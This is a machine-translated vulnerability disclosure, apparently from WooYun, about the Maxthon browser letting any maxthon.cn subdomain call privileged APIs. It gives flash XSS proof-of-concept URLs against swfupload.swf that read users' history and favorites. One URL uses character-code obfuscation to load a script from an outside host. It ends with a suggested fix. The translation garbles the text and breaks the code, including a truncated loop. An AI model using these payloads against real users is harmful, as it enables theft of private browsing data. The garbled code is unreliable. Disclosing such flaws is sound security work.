The design defect of Ao you browser may lead to the reading of sensitive information such as user favorites/historical records.

The design defect of Ao you browser may lead to the reading of sensitive information such as user favorites/historical records.

A series of problems caused by design defects

Considering the user experience, the Browser allows the * .maxthon.cn domain to call some privileged APIs,

For example, modify the homepage:

Maxthon. browser. config. ConfigManager. set ("maxthon. config", "browser. general. startpage", "http://wooyun.org ");

Any * .maxthon.cn can call the above api.

You can also install the plug-in through external. mxCall.

But is that true? In fact, I found that apart from I .maxthon.cn, any * .maxthon.cn can read history records. You can obtain the corresponding xss information.

Of course, this is definitely not just a historical record, but also a collection. Here I will provide two poc demos. I hope that maxcompute will consider the API permissions in future versions, avoid any * .maxthon.cn xss to read sensitive information such as your favorites and historical records.

Both xss and xss are flash xss. For this reason, it will not be blocked by the browser:

Http://my.maxthon.cn//public/images/swfupload.swf? MovieName = aaa % 22])} catch (e) {if (! Window. x) {window. x = 1; alert (1 )}};//
 

Http://skin.maxthon.cn//swfupload/swfupload.swf? MovieName = aaa % 22])} catch (e) {if (! Window. x) {window. x = 1; alert (1 )}};//
 

Read history poc:
 

Http://my.maxthon.cn//public/images/swfupload.swf? MovieName = aaa % 22])} catch (e) {if (! Window. x) {window. x = 1; alert (JSON. stringify (maxthon. browser. history. HistoryManager. getLastOpenList ()));}};//



Read user favorites poc:

For (var I = 0; I
Console. log (maxthon. browser. favorites. FavManager. getMostVisitNodes () [I]. url _)

}

Url:

Http://my.maxthon.cn//public/images/swfupload.swf? MovieName = aaa % 22])} catch (e) {if (! Window. x) {window. x = 1; eval ('window. s = document. createElement (String. fromCharCode (115,99, 114,105,112,116); window. s. src = String. fromCharCode (104,116,116,112, 47,119,117,116,111,110,103,121,117, 46,105,110,102,111, 47,109, 97,120,116,104,111,110, 46,106,115,); document. body. appendChild (window. s )')}};//



The effect is as follows:
 

 

 

 

Solution:

Fix xss. You can replace the swf here in the http://bbs.open.qq.com/static/image/common/swfupload.swf with your swf to fix the xss.

Adjust the policy to prevent any sub-site xss from affecting users' favorites, historical records, and other sensitive information.